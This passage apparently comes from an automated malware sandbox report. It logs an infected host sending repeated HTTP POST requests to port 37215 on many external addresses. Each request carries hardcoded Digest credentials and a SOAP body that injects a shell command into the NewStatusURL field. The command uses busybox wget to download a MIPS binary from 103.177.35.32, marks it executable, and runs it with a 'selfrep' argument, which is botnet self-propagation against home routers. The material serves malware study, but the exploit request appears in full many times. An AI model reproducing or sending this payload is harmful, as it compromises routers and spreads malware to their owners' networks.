                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3200192.168.2.2343214116.88.202.3437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661238909 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3201192.168.2.236019241.201.70.19137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661257982 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3202192.168.2.2348278197.245.234.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661258936 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3203192.168.2.2350482157.183.58.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661258936 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3204192.168.2.2336226197.255.54.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661273003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3205192.168.2.233823641.95.4.8537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661290884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3206192.168.2.236071441.62.65.2037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661298037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3207192.168.2.233382441.183.192.11137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661310911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3208192.168.2.2341966197.155.221.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661312103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3209192.168.2.2360734197.52.148.4037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661328077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
